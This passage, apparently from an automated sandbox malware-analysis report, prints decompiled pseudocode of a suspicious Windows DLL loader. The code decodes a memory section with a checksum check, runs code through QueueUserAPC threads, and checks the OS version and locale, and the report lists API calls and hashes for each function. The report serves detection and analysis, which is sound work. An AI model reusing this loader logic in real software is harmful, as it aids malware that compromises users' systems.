              					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
              					_t26 = E6E1C18AD(0, _t54); // executed
              					_v56 = _t26;
              					Sleep(_t54 << 5); // executed
              					_t21 = _v56;
              				} while (_t21 == 0xc);
              				if(_t21 != 0) {
              					goto L18;
              				}
              				_t27 = E6E1C1ADB(_t45);
              				_v52 = _t27;
              				if(_t27 != 0) {
              					L16:
              					_t21 = _v52;
              					if(_t21 == 0xffffffff) {
              						_t21 = GetLastError();
              					}
              					goto L18;
              				}
              				if(_a4 != 0) {
              					L11:
              					_push(0);
              					_t56 = E6E1C13D1(E6E1C14E8,  &_v28);
              					if(_t56 == 0) {
              						_v56 = GetLastError();
              					} else {
              						_t31 = WaitForSingleObject(_t56, 0xffffffff);
              						_v56 = _t31;
              						if(_t31 == 0) {
              							GetExitCodeThread(_t56,  &_v56);
              						}
              						CloseHandle(_t56);
              					}
              					goto L16;
              				}
              				if(E6E1C134F(_t45,  &_v48) != 0) {
              					 *0x6e1c41b8 = 0;
              					goto L11;
              				}
              				_t44 = _v48;
              				_t57 = __imp__GetLongPathNameW;
              				_t50 =  *_t57(_t44, 0, 0);
              				if(_t50 == 0) {
              					L9:
              					 *0x6e1c41b8 = _t44;
              					goto L11;
              				}
              				_t15 = _t50 + 2; // 0x2
              				_t39 = E6E1C1B58(_t50 + _t15);
              				 *0x6e1c41b8 = _t39;
              				if(_t39 == 0) {
              					goto L9;
              				} else {
              					 *_t57(_t44, _t39, _t50);
              					E6E1C142F(_t44);
              					goto L11;
              				}
              			}





















              0x6e1c1c89
              0x6e1c1c92
              0x6e1c1c96
              0x6e1c1d9e
              0x6e1c1da4
              0x00000000
              0x00000000
              0x00000000
              0x6e1c1c9c
              0x6e1c1c9c
              0x6e1c1ca1
              0x6e1c1ca7
              0x6e1c1cb6
              0x6e1c1cb7
              0x6e1c1cba
              0x6e1c1cbd
              0x6e1c1cc6
              0x6e1c1cca
              0x6e1c1cd0
              0x6e1c1cd4
              0x6e1c1cdb
              0x00000000
              0x00000000
              0x6e1c1ce1
              0x6e1c1ce8
              0x6e1c1cec
              0x6e1c1d8f
              0x6e1c1d8f
              0x6e1c1d96
              0x6e1c1d98
              0x6e1c1d98
              0x00000000
              0x6e1c1d96
              0x6e1c1cf5
              0x6e1c1d48
              0x6e1c1d48
              0x6e1c1d59
              0x6e1c1d5d
              0x6e1c1d8b
              0x6e1c1d5f
              0x6e1c1d62
              0x6e1c1d6a
              0x6e1c1d6e
              0x6e1c1d76
              0x6e1c1d76
              0x6e1c1d7d
              0x6e1c1d7d
              0x00000000
              0x6e1c1d5d
              0x6e1c1d03
              0x6e1c1d42
              0x00000000
              0x6e1c1d42
              0x6e1c1d05
              0x6e1c1d09
              0x6e1c1d14
              0x6e1c1d18
              0x6e1c1d3a
              0x6e1c1d3a
              0x00000000
              0x6e1c1d3a
              0x6e1c1d1a
              0x6e1c1d1f
              0x6e1c1d26
              0x6e1c1d2b
              0x00000000
              0x6e1c1d2d
              0x6e1c1d30
              0x6e1c1d33
              0x00000000
              0x6e1c1d33

              APIs
                • Part of subcall function 6E1C1F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1C1C8E,74B063F0,00000000), ref: 6E1C1F1F
                • Part of subcall function 6E1C1F10: GetVersion.KERNEL32 ref: 6E1C1F2E
                • Part of subcall function 6E1C1F10: GetCurrentProcessId.KERNEL32 ref: 6E1C1F3D
                • Part of subcall function 6E1C1F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1C1F56
              • GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 6E1C1CA1
              • SwitchToThread.KERNEL32 ref: 6E1C1CA7
                • Part of subcall function 6E1C18AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1C1903
                • Part of subcall function 6E1C18AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1C19C9
              • Sleep.KERNELBASE(00000000,00000000), ref: 6E1C1CCA
              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1C1D12
              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1C1D30
              • WaitForSingleObject.KERNEL32(00000000,000000FF,6E1C14E8,?,00000000), ref: 6E1C1D62
              • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E1C1D76
              • CloseHandle.KERNEL32(00000000), ref: 6E1C1D7D
              • GetLastError.KERNEL32(6E1C14E8,?,00000000), ref: 6E1C1D85
              • GetLastError.KERNEL32 ref: 6E1C1D98
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
              • String ID:
              • API String ID: 1962885430-0
              • Opcode ID: fdc9e92d1d465907f22880ace846725f18fdaa1e58afd678a08990da24bed37b
              • Instruction ID: 05e1698dc7c22bdfe323542b900fa9b2a15442dbdee2dd94200ac244c9319a58
              • Opcode Fuzzy Hash: fdc9e92d1d465907f22880ace846725f18fdaa1e58afd678a08990da24bed37b
              • Instruction Fuzzy Hash: B531A7726847419BC750DFE5884C9AF7AFDAFA6F58B104916F894C2140EB3CC489A7A3
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • VirtualAlloc.KERNELBASE(00000000,000006AB,00003000,00000040,000006AB,6E296BE0), ref: 6E297245
              • VirtualAlloc.KERNEL32(00000000,00000314,00003000,00000040,6E296C41), ref: 6E29727C
              • VirtualAlloc.KERNEL32(00000000,0000EC31,00003000,00000040), ref: 6E2972DC
              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E297312
              • VirtualProtect.KERNEL32(6E1C0000,00000000,00000004,6E297167), ref: 6E297417
              • VirtualProtect.KERNEL32(6E1C0000,00001000,00000004,6E297167), ref: 6E29743E
              • VirtualProtect.KERNEL32(00000000,?,00000002,6E297167), ref: 6E29750B
              • VirtualProtect.KERNEL32(00000000,?,00000002,6E297167,?), ref: 6E297561
              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E29757D
              Memory Dump Source
              • Source File: 00000000.00000002.461300505.000000006E296000.00000040.00020000.sdmp, Offset: 6E296000, based on PE: false
              Similarity
              • API ID: Virtual$Protect$Alloc$Free
              • String ID:
              • API String ID: 2574235972-0
              • Opcode ID: 809c7055cc761c65bd0d80cc4914a0d3f47182814d01b9dbc598a8231fe2a8b3
              • Instruction ID: 1680e39e4f1abc5d00b3de2304b19bf1a97eaed0b398433b3e31cdd07c0bbce8
              • Opcode Fuzzy Hash: 809c7055cc761c65bd0d80cc4914a0d3f47182814d01b9dbc598a8231fe2a8b3
              • Instruction Fuzzy Hash: D2D19D36500203AFDB16CF55C8A0B5177A6FF89310B0B4598ED1AEF3DAD771A80ADB64
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID:
              • String ID: PR)n$T$W
              • API String ID: 0-3270365719
              • Opcode ID: e951073df6e2001df1faf367814b67fef01e31d65a272cf1ce0837f7aa57a745
              • Instruction ID: 3d9fb1e5917b4f8cb47394d87f31f94bc9fe20393a7096d78658644b2affa550
              • Opcode Fuzzy Hash: e951073df6e2001df1faf367814b67fef01e31d65a272cf1ce0837f7aa57a745
              • Instruction Fuzzy Hash: D092A0B1A597528FDB04CFBAD49825ABBE3BB9A306F24592EE494C3344D3348449CF71
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
              				long _v8;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				char _t9;
              				void* _t10;
              				void* _t18;
              				void* _t23;
              				void* _t36;
              
              				_push(__ecx);
              				_t9 = _a8;
              				_v8 = 1;
              				if(_t9 == 0) {
              					_t10 = InterlockedDecrement(0x6e1c4188);
              					__eflags = _t10;
              					if(_t10 == 0) {
              						__eflags =  *0x6e1c418c;
              						if( *0x6e1c418c != 0) {
              							_t36 = 0x2328;
              							while(1) {
              								SleepEx(0x64, 1);
              								__eflags =  *0x6e1c4198;
              								if( *0x6e1c4198 == 0) {
              									break;
              								}
              								_t36 = _t36 - 0x64;
              								__eflags = _t36;
              								if(_t36 > 0) {
              									continue;
              								}
              								break;
              							}
              							CloseHandle( *0x6e1c418c);
              						}
              						HeapDestroy( *0x6e1c4190);
              					}
              				} else {
              					if(_t9 == 1 && InterlockedIncrement(0x6e1c4188) == 1) {
              						_t18 = HeapCreate(0, 0x400000, 0); // executed
              						_t41 = _t18;
              						 *0x6e1c4190 = _t18;
              						if(_t18 == 0) {
              							L6:
              							_v8 = 0;
              						} else {
              							 *0x6e1c41b0 = _a4;
              							asm("lock xadd [eax], edi");
              							_push( &_a8);
              							_t23 = E6E1C13D1(E6E1C20CE, E6E1C121C(_a12, 1, 0x6e1c4198, _t41));
              							 *0x6e1c418c = _t23;
              							if(_t23 == 0) {
              								asm("lock xadd [esi], eax");
              								goto L6;
              							}
              						}
              					}
              				}
              				return _v8;
              			}












              0x6e1c1db1
              0x6e1c1dbd
              0x6e1c1dbf
              0x6e1c1dc2
              0x6e1c1e38
              0x6e1c1e3e
              0x6e1c1e40
              0x6e1c1e42
              0x6e1c1e48
              0x6e1c1e4a
              0x6e1c1e4f
              0x6e1c1e52
              0x6e1c1e5d
              0x6e1c1e5f
              0x00000000
              0x00000000
              0x6e1c1e61
              0x6e1c1e64
              0x6e1c1e66
              0x00000000
              0x00000000
              0x00000000
              0x6e1c1e66
              0x6e1c1e6e
              0x6e1c1e6e
              0x6e1c1e7a
              0x6e1c1e7a
              0x6e1c1dc4
              0x6e1c1dc5
              0x6e1c1de5
              0x6e1c1deb
              0x6e1c1ded
              0x6e1c1df2
              0x6e1c1e2e
              0x6e1c1e2e
              0x6e1c1df4
              0x6e1c1dfc
              0x6e1c1e03
              0x6e1c1e0d
              0x6e1c1e19
              0x6e1c1e20
              0x6e1c1e25
              0x6e1c1e2a
              0x00000000
              0x6e1c1e2a
              0x6e1c1e25
              0x6e1c1df2
              0x6e1c1dc5
              0x6e1c1e87

              APIs
              • InterlockedIncrement.KERNEL32(6E1C4188), ref: 6E1C1DD0
              • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E1C1DE5
                • Part of subcall function 6E1C13D1: CreateThread.KERNELBASE ref: 6E1C13E8
                • Part of subcall function 6E1C13D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1C13FD
                • Part of subcall function 6E1C13D1: GetLastError.KERNEL32(00000000), ref: 6E1C1408
                • Part of subcall function 6E1C13D1: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1C1412
                • Part of subcall function 6E1C13D1: CloseHandle.KERNEL32(00000000), ref: 6E1C1419
                • Part of subcall function 6E1C13D1: SetLastError.KERNEL32(00000000), ref: 6E1C1422
              • InterlockedDecrement.KERNEL32(6E1C4188), ref: 6E1C1E38
              • SleepEx.KERNEL32(00000064,00000001), ref: 6E1C1E52
              • CloseHandle.KERNEL32 ref: 6E1C1E6E
              • HeapDestroy.KERNEL32 ref: 6E1C1E7A
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
              • String ID:
              • API String ID: 2110400756-0
              • Opcode ID: 93c57b8fb87c938260d5d050e5ec8779caa9878904f591e7b09f614ed0812f3f
              • Instruction ID: 8f3352a58246418d07f1a9f43faede5fccf891133e5ec329b7854fec8119d5f0
              • Opcode Fuzzy Hash: 93c57b8fb87c938260d5d050e5ec8779caa9878904f591e7b09f614ed0812f3f
              • Instruction Fuzzy Hash: 4821CF36744601AFEB019FE9C88CA4A3FB8F772E603218125E448D3140D23CA986FB52
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C13D1(long _a4, DWORD* _a12) {
              				_Unknown_base(*)()* _v0;
              				void* _t4;
              				long _t6;
              				long _t11;
              				void* _t13;
              
              				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e1c41cc, 0, _a12); // executed
              				_t13 = _t4;
              				if(_t13 != 0) {
              					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
              					if(_t6 == 0) {
              						_t11 = GetLastError();
              						TerminateThread(_t13, _t11);
              						CloseHandle(_t13);
              						_t13 = 0;
              						SetLastError(_t11);
              					}
              				}
              				return _t13;
              			}








              0x6e1c13e8
              0x6e1c13ee
              0x6e1c13f2
              0x6e1c13fd
              0x6e1c1405
              0x6e1c140e
              0x6e1c1412
              0x6e1c1419
              0x6e1c1420
              0x6e1c1422
              0x6e1c1428
              0x6e1c1405
              0x6e1c142c

              APIs
              • CreateThread.KERNELBASE ref: 6E1C13E8
              • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1C13FD
              • GetLastError.KERNEL32(00000000), ref: 6E1C1408
              • TerminateThread.KERNEL32(00000000,00000000), ref: 6E1C1412
              • CloseHandle.KERNEL32(00000000), ref: 6E1C1419
              • SetLastError.KERNEL32(00000000), ref: 6E1C1422
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
              • String ID:
              • API String ID: 3832013932-0
              • Opcode ID: 52e76519a5a94b95598527cb7ce9f70990b0919b872d196cc21a6142f7820c10
              • Instruction ID: 1e0629bde33280a18db333d60db0f8d39a5fb3288d0537c365b588c66174f1de
              • Opcode Fuzzy Hash: 52e76519a5a94b95598527cb7ce9f70990b0919b872d196cc21a6142f7820c10
              • Instruction Fuzzy Hash: 1EF01C37205B21BBDB125BA08C0CF9FBF69FB1AF51F00C444F609D1150C72A8866BBA5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 90%
              			E6E1C18AD(void* __edi, intOrPtr _a4) {
              				intOrPtr _v8;
              				char _v12;
              				void* _v16;
              				unsigned int _v20;
              				intOrPtr _v24;
              				char _v28;
              				signed int _v32;
              				void* _v36;
              				signed int _v40;
              				signed char _v44;
              				void* _v48;
              				signed int _v56;
              				signed int _v60;
              				intOrPtr _t50;
              				void* _t57;
              				void* _t61;
              				signed int _t67;
              				signed char _t69;
              				signed char _t70;
              				void* _t76;
              				intOrPtr _t77;
              				unsigned int _t82;
              				intOrPtr _t86;
              				intOrPtr* _t89;
              				intOrPtr _t90;
              				void* _t91;
              				signed int _t93;
              
              				_t90 =  *0x6e1c41b0;
              				_t50 = E6E1C1000(_t90,  &_v28,  &_v20);
              				_v24 = _t50;
              				if(_t50 == 0) {
              					asm("sbb ebx, ebx");
              					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
              					_t91 = _t90 + _v28;
              					_v48 = _t91;
              					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
              					_t76 = _t57;
              					_v36 = _t76;
              					if(_t76 == 0) {
              						_v24 = 8;
              					} else {
              						_t69 = 0;
              						if(_t67 <= 0) {
              							_t77 =  *0x6e1c41cc;
              						} else {
              							_t86 = _a4;
              							_v8 = _t91;
              							_v8 = _v8 - _t76;
              							_t14 = _t86 + 0x6e1c5137; // 0xc7b49ffa
              							_t61 = _t57 - _t91 + _t14;
              							_v16 = _t76;
              							do {
              								asm("movsd");
              								asm("movsd");
              								asm("movsd");
              								_t70 = _t69 + 1;
              								_v44 = _t70;
              								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
              								if(_t82 != 0) {
              									_v32 = _v32 & 0x00000000;
              									_t89 = _v16;
              									_v12 = 0x400;
              									do {
              										_t93 =  *((intOrPtr*)(_v8 + _t89));
              										_v40 = _t93;
              										if(_t93 == 0) {
              											_v12 = 1;
              										} else {
              											 *_t89 = _t93 + _v32 - _t82;
              											_v32 = _v40;
              											_t89 = _t89 + 4;
              										}
              										_t33 =  &_v12;
              										 *_t33 = _v12 - 1;
              									} while ( *_t33 != 0);
              								}
              								_t69 = _v44;
              								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
              								_v16 = _v16 + 0x1000;
              								 *0x6e1c41cc = _t77;
              							} while (_t69 < _t67);
              						}
              						if(_t77 != 0x63699bc3) {
              							_v24 = 0xc;
              						} else {
              							memcpy(_v48, _v36, _v20);
              						}
              						VirtualFree(_v36, 0, 0x8000); // executed
              					}
              				}
              				return _v24;
              			}






























              0x6e1c18b4
              0x6e1c18c4
              0x6e1c18cb
              0x6e1c18ce
              0x6e1c18e3
              0x6e1c18ea
              0x6e1c18ef
              0x6e1c1900
              0x6e1c1903
              0x6e1c1909
              0x6e1c190d
              0x6e1c1910
              0x6e1c19ec
              0x6e1c1916
              0x6e1c1916
              0x6e1c191a
              0x6e1c19b2
              0x6e1c1920
              0x6e1c1921
              0x6e1c1926
              0x6e1c1929
              0x6e1c192c
              0x6e1c192c
              0x6e1c1933
              0x6e1c1936
              0x6e1c193e
              0x6e1c193f
              0x6e1c1940
              0x6e1c1947
              0x6e1c194b
              0x6e1c1951
              0x6e1c1955
              0x6e1c1957
              0x6e1c195b
              0x6e1c195e
              0x6e1c1965
              0x6e1c1968
              0x6e1c196d
              0x6e1c1970
              0x6e1c1986
              0x6e1c1972
              0x6e1c197c
              0x6e1c197e
              0x6e1c1981
              0x6e1c1981
              0x6e1c198d
              0x6e1c198d
              0x6e1c198d
              0x6e1c1965
              0x6e1c1998
              0x6e1c199b
              0x6e1c199e
              0x6e1c19a7
              0x6e1c19a7
              0x6e1c19af
              0x6e1c19be
              0x6e1c19d3
              0x6e1c19c0
              0x6e1c19c9
              0x6e1c19ce
              0x6e1c19e4
              0x6e1c19e4
              0x6e1c19f3
              0x6e1c19f9

              APIs
              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1C1903
              • memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1C19C9
              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6E1C19E4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Virtual$AllocFreememcpy
              • String ID: Jun 6 2021
              • API String ID: 4010158826-1013970402
              • Opcode ID: 9041a89bcec87a96430e14d1da3950d0a1523ac08092a97f323d91dd00585abe
              • Instruction ID: 946bd0d6041729a63682bd53d4e662095b0b71ab877402adc9a4d5ab533848a2
              • Opcode Fuzzy Hash: 9041a89bcec87a96430e14d1da3950d0a1523ac08092a97f323d91dd00585abe
              • Instruction Fuzzy Hash: BB419171E4020A9FDF00CFD9C844ADEBBB5BF59B10F248129D905B7244C779AA46DF92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			E6E1C20CE(void* __ecx, intOrPtr _a4) {
              				long _t3;
              				int _t4;
              				int _t9;
              				void* _t13;
              
              				_t13 = GetCurrentThread();
              				_t3 = SetThreadAffinityMask(_t13, 1); // executed
              				if(_t3 != 0) {
              					SetThreadPriority(_t13, 0xffffffff); // executed
              				}
              				_t4 = E6E1C1C7D(_a4); // executed
              				_t9 = _t4;
              				if(_t9 == 0) {
              					SetThreadPriority(_t13, _t4);
              				}
              				asm("lock xadd [eax], ecx");
              				return _t9;
              			}







              0x6e1c20d7
              0x6e1c20dc
              0x6e1c20ea
              0x6e1c20ef
              0x6e1c20ef
              0x6e1c20f5
              0x6e1c20fa
              0x6e1c20fe
              0x6e1c2102
              0x6e1c2102
              0x6e1c210c
              0x6e1c2115

              APIs
              • GetCurrentThread.KERNEL32 ref: 6E1C20D1
              • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1C20DC
              • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E1C20EF
              • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E1C2102
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Thread$Priority$AffinityCurrentMask
              • String ID:
              • API String ID: 1452675757-0
              • Opcode ID: 933d557eee8d911dd6a402775c867d4bb5510db097fbc0c16182fbf50dc663b2
              • Instruction ID: 2c79e13bd90c19555bf51c108f274b45117525a1d704e67eb3550663ab7717a1
              • Opcode Fuzzy Hash: 933d557eee8d911dd6a402775c867d4bb5510db097fbc0c16182fbf50dc663b2
              • Instruction Fuzzy Hash: 5CE09232305A112B96016B6D4C8CEAFAB9CEFA2B307110235F524D21D0CF9C8C5AB5AA
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetTempPathA.KERNEL32(00000404,6E296410,?), ref: 6E291A78
              • VirtualProtect.KERNELBASE(?,0000311B,00000040,?), ref: 6E291ACB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: PathProtectTempVirtual
              • String ID: @
              • API String ID: 3422257996-2766056989
              • Opcode ID: 96b367ceb8b84aa88f6892ffd6cf1cab6d122d737cbd145f412c7706924fe3cb
              • Instruction ID: e63cf76e46b8c40e7ecaee793d322dc0eb3f9865a1344321cf64369ce3d49a0f
              • Opcode Fuzzy Hash: 96b367ceb8b84aa88f6892ffd6cf1cab6d122d737cbd145f412c7706924fe3cb
              • Instruction Fuzzy Hash: 4BA16CB0E42505CBDB08CFBAC48866DBBB3FF4A30AF54A12AD525A7359D7345540CB74
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              APIs
              • ___crtGetLocaleInfoA.LIBCMT ref: 6E223C12
                • Part of subcall function 6E22FA7E: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E22FA8A
                • Part of subcall function 6E22FA7E: __crtGetLocaleInfoA_stat.LIBCMT ref: 6E22FA9F
              • GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6E223C24
              • ___crtGetLocaleInfoA.LIBCMT ref: 6E223C44
              • ___crtGetLocaleInfoA.LIBCMT ref: 6E223C86
              • __calloc_crt.LIBCMT ref: 6E223C59
                • Part of subcall function 6E223A00: __calloc_impl.LIBCMT ref: 6E223A0F
              • __calloc_crt.LIBCMT ref: 6E223C9B
              • _free.LIBCMT ref: 6E223CB3
              • _free.LIBCMT ref: 6E223CF3
              • __calloc_crt.LIBCMT ref: 6E223D1D
              • _free.LIBCMT ref: 6E223D43
              • __invoke_watson.LIBCMT ref: 6E223D93
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: Locale$Info$___crt__calloc_crt_free$A_statErrorLastUpdateUpdate::___calloc_impl__crt__invoke_watson
              • String ID:
              • API String ID: 1731282729-0
              • Opcode ID: 890426af0763d8a41b789f8a4739d93e799ac05cf50d20d97ab1d572d7c9b804
              • Instruction ID: 91a273b7995749c39333252be1b6a8c94678e58d70d3b27ba582f3c2f350ef32
              • Opcode Fuzzy Hash: 890426af0763d8a41b789f8a4739d93e799ac05cf50d20d97ab1d572d7c9b804
              • Instruction Fuzzy Hash: FA515FB990421FAFEB649FA58D49BDA7B7EFF04314F1044B5E908A6241EF3289548B60
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • _wcscmp.LIBCMT ref: 6E22E86E
              • _wcscmp.LIBCMT ref: 6E22E87F
              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6E22E89B
              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 6E22E8C5
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: InfoLocale_wcscmp
              • String ID:
              • API String ID: 1351282208-0
              • Opcode ID: 27e5bda060de6d18f2e622aa396480e475bb136b80e8be7d726de2fb2209c736
              • Instruction ID: d72f3ebb0ab87946e1b9d78f32fac50a19ea9ced617190429f4e59992035ade0
              • Opcode Fuzzy Hash: 27e5bda060de6d18f2e622aa396480e475bb136b80e8be7d726de2fb2209c736
              • Instruction Fuzzy Hash: F501843525851EAFFB429EE8C845ECA37DEAF05656B008435F944DA1A0E730D580E7D2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C1F10() {
              				void* _t1;
              				long _t3;
              				void* _t4;
              				long _t5;
              				void* _t6;
              				intOrPtr _t8;
              
              				_t8 =  *0x6e1c41b0;
              				_t1 = CreateEventA(0, 1, 0, 0);
              				 *0x6e1c41bc = _t1;
              				if(_t1 == 0) {
              					return GetLastError();
              				}
              				_t3 = GetVersion();
              				if(_t3 <= 5) {
              					_t4 = 0x32;
              					return _t4;
              				} else {
              					 *0x6e1c41ac = _t3;
              					_t5 = GetCurrentProcessId();
              					 *0x6e1c41a8 = _t5;
              					 *0x6e1c41b0 = _t8;
              					_t6 = OpenProcess(0x10047a, 0, _t5);
              					 *0x6e1c41a4 = _t6;
              					if(_t6 == 0) {
              						 *0x6e1c41a4 =  *0x6e1c41a4 | 0xffffffff;
              					}
              					return 0;
              				}
              			}









              0x6e1c1f11
              0x6e1c1f1f
              0x6e1c1f27
              0x6e1c1f2c
              0x6e1c1f76
              0x6e1c1f76
              0x6e1c1f2e
              0x6e1c1f36
              0x6e1c1f72
              0x6e1c1f74
              0x6e1c1f38
              0x6e1c1f38
              0x6e1c1f3d
              0x6e1c1f4b
              0x6e1c1f50
              0x6e1c1f56
              0x6e1c1f5e
              0x6e1c1f63
              0x6e1c1f65
              0x6e1c1f65
              0x6e1c1f6f
              0x6e1c1f6f

              APIs
              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1C1C8E,74B063F0,00000000), ref: 6E1C1F1F
              • GetVersion.KERNEL32 ref: 6E1C1F2E
              • GetCurrentProcessId.KERNEL32 ref: 6E1C1F3D
              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1C1F56
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Process$CreateCurrentEventOpenVersion
              • String ID:
              • API String ID: 845504543-0
              • Opcode ID: 40b5d2db281a1f08b3abba376e25a0ec80b613e9ee2c174c19d5b12452c20036
              • Instruction ID: 51aa3f2096f753addaedce12120e78271127343c77df0434785102bce9e58d26
              • Opcode Fuzzy Hash: 40b5d2db281a1f08b3abba376e25a0ec80b613e9ee2c174c19d5b12452c20036
              • Instruction Fuzzy Hash: ADF01D72688A10AFEF509FA9A81E7893FB4B72BF11F108059F199C91C0D3786447BB45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 58%
              			E6E1C1E8A(void* __ecx) {
              				char _v8;
              				signed short _t7;
              
              				_v8 = _v8 & 0x00000000;
              				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
              				if(_t7 == 0) {
              					__imp__GetSystemDefaultUILanguage();
              					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
              				}
              				return _v8;
              			}





              0x6e1c1e8e
              0x6e1c1e9f
